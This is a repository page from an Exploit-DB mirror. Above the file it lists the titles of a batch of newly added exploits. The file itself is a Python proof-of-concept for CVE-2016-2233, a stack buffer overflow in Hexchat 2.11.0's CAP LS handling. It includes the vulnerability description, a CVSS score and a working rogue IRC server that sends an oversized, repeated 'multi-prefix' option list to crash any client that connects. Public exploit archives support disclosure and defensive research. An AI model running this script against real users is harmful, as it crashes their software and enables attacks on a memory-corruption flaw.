bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/multiple/dos/39657.py
Offensive Security 13d072b592 DB: 2016-04-05 
4 new exploits

Outlook ATTACH_BY_REF_ONLY File Execution
Outlook - ATTACH_BY_REF_ONLY File Execution

HB Ecommerce SQL Injection Vulnerability
HB Ecommerce - SQL Injection Vulnerability

SCO Open Server <= 5.0.4 POP Server Buffer Overflow Vulnerability
SCO Open Server <= 5.0.4 - POP Server Buffer Overflow Vulnerability

Debian Linux <= 2.1 Print Queue Control Vulnerability
Debian Linux <= 2.1 - Print Queue Control Vulnerability

FreeBSD 3.3 gdc Buffer Overflow Vulnerability
FreeBSD 3.3 gdc - Buffer Overflow Vulnerability

Netscape FastTrack Server 2.0.1 a GET Buffer Overflow Vulnerability
Netscape FastTrack Server 2.0.1a - GET Buffer Overflow Vulnerability

NullSoft Winamp 2.10 Playlist Vulnerability
NullSoft Winamp 2.10 - Playlist Vulnerability

S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (2)
S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount - Buffer Overflow (2)

Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability
Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent Vulnerability

NetcPlus SmartServer3 3.75 Weak Encryption Vulnerability
NetcPlus SmartServer3 3.75 - Weak Encryption Vulnerability

NetcPlus BrowseGate 2.80.2 Weak Encryption Vulnerability
NetcPlus BrowseGate 2.80.2 - Weak Encryption Vulnerability

My Postcards 6.0 MagicCard.CGI Arbitrary File Disclosure Vulnerability
My Postcards 6.0 - MagicCard.CGI Arbitrary File Disclosure Vulnerability

Gom Player 2.1.44.5123 (Unicode) NULL Pointer Dereference
Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference

Tower Toppler 0.99.1 Display Variable Local Buffer Overflow Vulnerability
Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow Vulnerability

Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability
Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability

IDA Pro 6.3 Crash PoC
IDA Pro 6.3 - Crash PoC

Confixx 2 Perl Debugger Remote Command Execution Vulnerability
Confixx 2 - Perl Debugger Remote Command Execution Vulnerability

Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability
Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation Vulnerability

Novell NetMail 3.x Automatic Script Execution Vulnerability
Novell NetMail 3.x - Automatic Script Execution Vulnerability

Juniper Netscreen 5.0 VPN Username Enumeration Vulnerability
Juniper Netscreen 5.0 - VPN Username Enumeration Vulnerability

Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability
Microsoft Internet Explorer 7.0 - MHTML Denial of Service Vulnerability

WordPress Freshmail Unauthenticated SQL Injection
WordPress Freshmail - Unauthenticated SQL Injection

WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS
WordPress Download Manager Free 2.7.94 & Pro 4 - Authenticated Stored XSS

Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass

ADH-Web Server IP-Cameras - Multiple Vulnerabilities
Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC
Hexchat IRC Client 2.11.0 - Directory Traversal
Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow
PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities
2016-04-05 05:03:46 +00:00

74 lines
2.2 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - CAP LS Handling Stack Buffer Overflow
# Date: 2016-02-07
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits) + HexChat 2.10.2 & Windows 8.1 (64 bits)
# CVE : CVE-2016-2233
#############################
# Vulnerability description #
#############################
'''
Stack Buffer Overflow in src/common/inbound.c :
void inbound_cap_ls (server *serv, char *nick, char *extensions_str, const message_tags_data *tags_data)
In this function, Hexchat IRC client receives the available extensions from
the IRC server (CAP LS message) and constructs the request string to indicate
later which one to use (CAP REQ message).
This request string is stored in the fixed size (256 bytes) byte array
'buffer'. It has enough space for all possible options combined, BUT
it will overflow if some options are repeated.
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10
'''
####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : Hexchat will crash (most probably access violation/segmentation fault)
'''
import socket
import sys
import time
# Exploit configuration
HOST = ''
PORT = 6667
SERVERNAME = 'irc.example.com'
OPTIONS = 'multi-prefix ' * 100 # 13*100 = 1300 bytes > 256 bytes
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((HOST, PORT)) # Bind to port
sock.listen(0) # Start listening on socket
print 'Server listening, waiting for connection...'
conn, addr = sock.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'
conn.send(':' + SERVERNAME + ' CAP * LS :' + OPTIONS + '\r\n')
# Wait and close socket
conn.recv(256)
sock.close()
print 'Done.'
except socket.error as msg:
print 'Network error : ' + str(msg[0]) + ' ' + msg[1]
Reference in a new issue View git blame Copy permalink